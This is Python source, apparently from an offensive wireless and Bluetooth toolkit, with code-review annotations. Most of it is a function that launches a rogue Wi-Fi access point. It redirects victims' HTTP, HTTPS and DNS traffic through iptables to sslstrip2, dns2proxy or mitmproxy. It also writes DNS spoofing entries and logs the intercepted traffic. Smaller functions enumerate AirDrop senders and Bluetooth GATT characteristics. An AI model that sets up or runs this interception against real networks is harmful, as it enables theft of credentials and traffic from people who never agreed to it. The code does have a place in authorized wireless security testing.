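def add_service(self, zeroconf, type, name):
    """Zeroconf listener callback: resolve the service and print address, instance name and host.

    ``get_service_info`` returns ``None`` when the record cannot be resolved
    in time; that case is reported instead of raising ``AttributeError``.
    NOTE(review): ``info.address`` is the single-address attribute of older
    zeroconf releases; newer ones expose ``addresses`` - confirm the pinned version.
    """
    info = zeroconf.get_service_info(type, name)
    if info is None:
        print_error(f"Could not resolve service {name}")
        return
    addr = ipaddress.ip_address(info.address)
    print_info(f"{addr} {info.name} {info.server}")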
def start_listetninig(self):
    """Run the AirDrop receiver (``AirDropCli``, presumably opendrop's ``receive`` command) and wait for senders."""
    print_info("[*] Looking for AirDrop senders...")
    receiver_argv = ["receive"]
    AirDropCli(receiver_argv)
def _exit(self, param=None):
    """Kill every registered background task, then terminate the process with status 0.

    ``param`` is accepted for the command-dispatch signature and ignored.
    """
    print_info("Killing tasks... ")
    task_registry = Task().get_instance()
    task_registry.kill_all_tasks()
    print_info("Bye...")
    # Module-level _exit (presumably os._exit): exits without running
    # interpreter shutdown or atexit handlers.
    _exit(0)
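def _print_char(self, ch):
    """Print one GATT characteristic: common name, UUID, handle, value (when readable) and properties.

    The value is shown as text when the bytes decode to something non-empty,
    otherwise as the raw bytes; a failed read is reported instead of raising.
    """
    print_info(f"<b>{ch.uuid.getCommonName()}</b>")
    print_info(f"|_ uuid: {ch.uuid}")
    handle = ch.handle
    print_info(f"|_ handle: {hex(handle)} ({handle})")
    if ch.supportsRead():
        try:
            raw = ch.read()
        except Exception:
            # Typical causes: characteristic needs pairing/authentication, or
            # the link dropped mid-enumeration.
            print_info("|_ value: <ansired>Couldn't read</ansired>")
        else:
            decoded = raw.decode(errors="ignore")
            print_info(f"|_ value: {decoded if decoded else raw}")
    print_info(f"|_ properties: {ch.propertiesToString()}")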
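def launch_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, wpa_passphrase, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, all_dns, proxy_if):
    """Bring up a rogue access point on ``ap_iface``, NAT'ed out through ``net_iface``.

    Host configuration is delegated to ``network_manager_config`` (which also
    returns ``script_path``), ``dnsmasq_config``, ``hotspad_config`` and
    ``ip_tables_config``; this function then runs one mode until Ctrl+C:
      * ``sslstrip_if``: sslstrip2 (port 9000) and dns2proxy in screen
        sessions, HTTP and DNS redirected to them, spoof entries from
        ``all_dns["ssl"]`` when ``dns_if``;
      * ``proxy_if`` != "no": hostapd in a screen session and mitmproxy in the
        foreground on 8080 (port 80 only for "nossl", else 80 and 443);
      * otherwise hostapd in the foreground, with ``all_dns["no_ssl"]``
        appended to /etc/dnsmasq.conf when ``dns_if``.
    ``stop_ap`` always runs in ``finally`` to restore the host.

    The ``*_if`` and ``hostapd_wpa`` flags arrive as strings ("true"/"false")
    and are coerced here.
    """
    import shlex

    sslstrip_if = str(sslstrip_if).lower() == "true"
    driftnet_if = str(driftnet_if).lower() == "true"
    wireshark_if = str(wireshark_if).lower() == "true"
    tshark_if = str(tshark_if).lower() == "true"
    dns_if = str(dns_if).lower() == "true"
    hostapd_wpa = str(hostapd_wpa).lower() == "true"

    # Fail before touching any system file: hostapd rejects a WPA-PSK passphrase
    # outside 8..63 characters, and the `finally` below would otherwise
    # "restore" files that were never backed up.
    if hostapd_wpa and not 8 <= len(str(wpa_passphrase)) <= 63:
        print_error("wpa_passphrase must be between 8 and 63 characters")
        return

    q = shlex.quote  # every value spliced into a shell line below is quoted
    try:
        # Network manager config
        script_path = network_manager_config(ap_iface)
        #DNSMASQ CONFIG
        dnsmasq_config(ap_iface, sslstrip_if)
        #HOSTAPD CONFIG
        hotspad_config(ap_iface, ssid, channel, wpa_passphrase, hostapd_wpa)
        #IPTABLES
        ip_tables_config(ap_iface, net_iface)

        #SSLSTRIP MODE
        if sslstrip_if:
            #SSLSTRIP DNS SPOOFING
            if dns_if:
                spoof_cfg = script_path + "src/dns2proxy/spoof.cfg"
                print_info("Backing up " + spoof_cfg + "...")
                os.system("sudo cp " + q(spoof_cfg) + " " + q(spoof_cfg + ".backup"))
                # NOTE(review): the shell redirections below run as the invoking
                # user, not root; this only works when the checkout is writable.
                os.system("sudo cat /dev/null > " + q(spoof_cfg))
                for ssl_dns_line in all_dns["ssl"]:
                    os.system("sudo echo -e " + q(ssl_dns_line) + " >> " + q(spoof_cfg))
            #/SSLSTRIP DNS SPOOFING
            start_dns_masq()
            os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000")
            os.system("sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 53")
            os.system("sudo iptables -t nat -A PREROUTING -p tcp --dport 53 -j REDIRECT --to-port 53")
            os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")
            print_info("Starting AP on " + ap_iface + " in screen terminal...")
            os.system("sudo screen -S mitmap-sslstrip -m -d python " + q(script_path + "src/sslstrip2/sslstrip.py") + " -l 9000 -w " + q(script_path + "logs/mitmap-sslstrip.log") + " -a")
            dns2proxy_cmd = "cd " + q(script_path + "src/dns2proxy") + " && python dns2proxy.py"
            os.system("sudo screen -S mitmap-dns2proxy -m -d sh -c " + q(dns2proxy_cmd))
            time.sleep(5)
            os.system("sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf")
            start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if)
            try:
                time.sleep(5)
            except KeyboardInterrupt:
                print("")
            print_ok("Done")
            # Idle until Ctrl+C; the KeyboardInterrupt propagates to the handler below.
            while True:
                time.sleep(1)
        #/SSLSTRIP MODE
        else:
            #DNSMASQ DNS SPOOFING
            if dns_if:
                print_info("Backing up /etc/dnsmasq.conf...")
                # NOTE(review): dnsmasq_config() has presumably already backed up
                # and rewritten /etc/dnsmasq.conf; if so, this copy overwrites the
                # backup with the new file and stop_ap cannot restore the original.
                os.system("sudo cp /etc/dnsmasq.conf /etc/dnsmasq.conf.backup")
                # The stray echo into dns2proxy's spoof.cfg used an unbound name
                # (ssl_dns_line) in this branch; dnsmasq only needs the append.
                for no_ssl_dns_line in all_dns["no_ssl"]:
                    append_file("/etc/dnsmasq.conf", no_ssl_dns_line)
            else:
                print_info("Skipping..")
            #/DNSMASQ DNS SPOOFING
            start_dns_masq()

            #MITMPROXY MODE
            proxy_if = proxy_if.lower()
            if proxy_if != "no":
                if proxy_if == "nossl":
                    os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")
                else:
                    print("To install the certificate, go to 'http://mitm.it/' through the proxy, and choose your OS.")
                    os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")
                    os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080")
                os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")
                print("Starting AP on " + ap_iface + " in screen terminal...")
                # The capture tools are started by start_services() below; the
                # flags are booleans here, so the old `== "y"` checks never ran.
                os.system("sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf")
                print("\nStarting MITMPROXY in 5 seconds... (press q and y to exit)\n")
                try:
                    time.sleep(5)
                except KeyboardInterrupt:
                    print("")
                # NOTE(review): -T/--host are pre-3.0 mitmproxy flags; verify
                # against the installed version.
                os.system("sudo mitmproxy -T --host --follow -w " + q(script_path + "logs/mitmap-proxy.mitmproxy"))
            else:
                print("Skipping proxy...")
            #/MITMPROXY MODE

            start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if)
            os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")
            print_info("Starting AP on " + ap_iface + "...\n")
            # Blocks until hostapd exits. NOTE(review): in proxy mode a hostapd
            # screen session is already up, so this second instance is expected
            # to fail on the busy interface and fall through to stop_ap.
            os.system("sudo hostapd /etc/hostapd/hostapd.conf")
            print_ok("Done")
    except KeyboardInterrupt:
        pass
    except Exception as e:
        print_error(e)
    finally:
        stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path)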
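def start_dns_masq():
    """(Re)start dnsmasq with the current /etc/dnsmasq.conf.

    Stops the init.d service (quietly; it may not exist on this host), kills
    any leftover instance, then launches dnsmasq through sudo. Commands are
    passed as argument lists, so no shell is involved.
    """
    import subprocess

    print_info("Starting DNSMASQ server...")
    subprocess.call(["sudo", "/etc/init.d/dnsmasq", "stop"],
                    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    subprocess.call(["sudo", "pkill", "dnsmasq"])
    subprocess.call(["sudo", "dnsmasq"])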